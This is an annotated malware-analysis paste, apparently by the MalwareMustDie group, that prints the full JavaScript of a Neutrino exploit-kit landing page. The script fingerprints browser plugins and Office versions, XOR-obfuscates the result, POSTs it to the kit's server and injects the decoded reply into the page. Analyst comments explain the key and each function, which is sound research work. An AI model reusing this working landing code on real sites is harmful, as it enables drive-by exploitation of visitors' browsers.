- // #MalwareMustDie!
- // My personal note..
- // New form of Neutrino EK landing page?
- // A quest! Where's the XOR data now? :-D
- <script src='xsvhwjx.js'></script>
- <script src='qmqsfiutp.js'>
- </script><script src='hrcl.js'></script>
- <link href='xbbcukphokdo.css' rel='stylesheet'>
- <link href='nhpgbsrcogf.css' rel='stylesheet'>
- <link href='bbehoufqwh.css' rel='stylesheet'>
- <script src='gdhclsjileqh.js'></script>
- <script src='nrezixfqsy.js'></script>
- <script src='sgxvswm.js'></script>
- <script src='ztblmkuxokfcyxgy.js'></script>
- <script type="text/javascript" src="index.js"></script> // <=== @malwaremustdie: Plugindetect?? (rq() below calls PluginDetect.getVersion, so one of these includes has to define it)
- <script src='dwwccp.js'></script>
- <script src='zkbvwzvq.js'></script>
- <script>
- $(document).ready(function() // runs rq() once the DOM is ready; the five strings below are this landing page's per-instance parameters
- {
- rq(
- "51f2394faaa2cc390a075f4c", // a: reported to the server as "hid" inside the fingerprint string built by rq()
- "eyhuui", // <== @malforsec & @malwaremustdie: OK this is the key :-) (c: repeating XOR key for www(); rq() also sends it in clear in the POST body)
- "uvkotuiae", // <=== @malwaremustdie: POST command value (f: rq() hands this to $.post() as its first argument, so it is the relative request path)
- "ngrdddfrrlrzro", // e: name of the POST field that carries the key
- "gfsjmndvvz" // g: name of the POST field that carries the XOR-obfuscated, URI-encoded fingerprint
- )
- }
- );
- function rq(a,c,f,e,g) // fingerprints the browser's plugins, POSTs the result to f, then injects the server's reply into the page
- { // a = host id ("hid"), c = XOR key, f = POST URL, e = POST field name for the key, g = POST field name for the fingerprint
- var d=PluginDetect.getVersion,b=[]; // // <== @malwaremustdie: PoC of PluginDetect v0.8.0 (d = PluginDetect.getVersion, b = list of "name:::value" entries)
- b.push("hid:::"+a);
- b.push("adobe_reader:::"+d("AdobeReader"));
- b.push("java:::"+d("Java"));
- b.push("flash:::"+d("Flash"));
- b.push("quick_time:::"+d("QuickTime"));
- b.push("real_player:::"+d("RealPlayer"));
- b.push("shockwave:::"+d("Shockwave"));
- b.push("silver_light:::"+d("Silverlight"));
- b.push("vlc:::"+d("VLC"));
- b.push("wmp:::"+d("WMP"));
- b.push("office:::"+office_ver()); // office_ver() returns "2010", "2007" or null, so this entry can read "office:::null"
- a={}; // a is reused as the POST body object; the original hid value now exists only inside b
- a[e]=c; // <=== review: c is the second argument (the key "eyhuui"), not "51f2394faaa2cc390a075f4c"; the key is posted in clear under field e
- a[g]=encodeURIComponent(www(b.join(";;;"),c)); // <== @malwaremustdie: Assembling the POST query. (entries joined with ";;;", XORed with c, then URI-encoded)
- $.post(f,a,function(a, // the callback's a shadows the outer a and holds the response body
- b)
- {
- $("body").append(www(decodeURIComponent(a),c)) // <== @malwaremustdie: A DAT www is XOR function. (the reply is XOR-decoded with the same key and appended to <body> as markup; the XOR data is that reply, which is not part of this paste. Because the key travels in the same POST, a captured request/response pair can be decoded offline)
- }
- )
- }
- function www(a,c) // <=== @malwaremustdie: XOR function name in camouflaged (a = input string, c = key string; returns a string of the same length)
- { // XOR is its own inverse, so rq() uses this one routine for both the outgoing fingerprint and the incoming reply
- for(var f="",e=0,g=0,e=0;e<a.length;e++) // <=== @malwaremustdie: XOR logic (e is declared twice in the var list, which is harmless; the loop body is the comma expression on the next two lines)
- g=Math.floor(e%c.length), // key index wraps around c; Math.floor changes nothing here because e and c.length are integers
- f+=String.fromCharCode(a.charCodeAt(e)^c.charCodeAt(g)); // XOR one UTF-16 code unit of the input with one of the key
- return f
- }
- function office_ver() // guesses the installed Office release by probing two SharePoint ActiveX ProgIDs; returns "2010", "2007" or null
- {
- var a=0,c=0; // both stay the number 0 unless the matching ActiveX object can be created
- try
- {
- a=new ActiveXObject("SharePoint.OpenDocuments.4")
- }
- catch(f)
- { // failure (control missing, or ActiveXObject undefined in this browser) is swallowed and a stays 0
- }
- try
- {
- c=new ActiveXObject("SharePoint.OpenDocuments.3")
- }
- catch(e)
- {
- } // <=== @malwaremustdie: here goes the exploit payloads access... (review: the visible code only swallows the probe error here; no payload fetch happens in this function)
- return"object"==typeof a&&"object"==typeof c?"2010":"number"==typeof a&&"object"==typeof c?"2007":null // both created -> "2010"; only the .3 control -> "2007"; anything else, including only .4 -> null
- };
- </script>
- ----
- #MalwareMustDie!
- @unixfreaxjp ~]$ date
- Sat Jul 27 01:17:40 JST 2013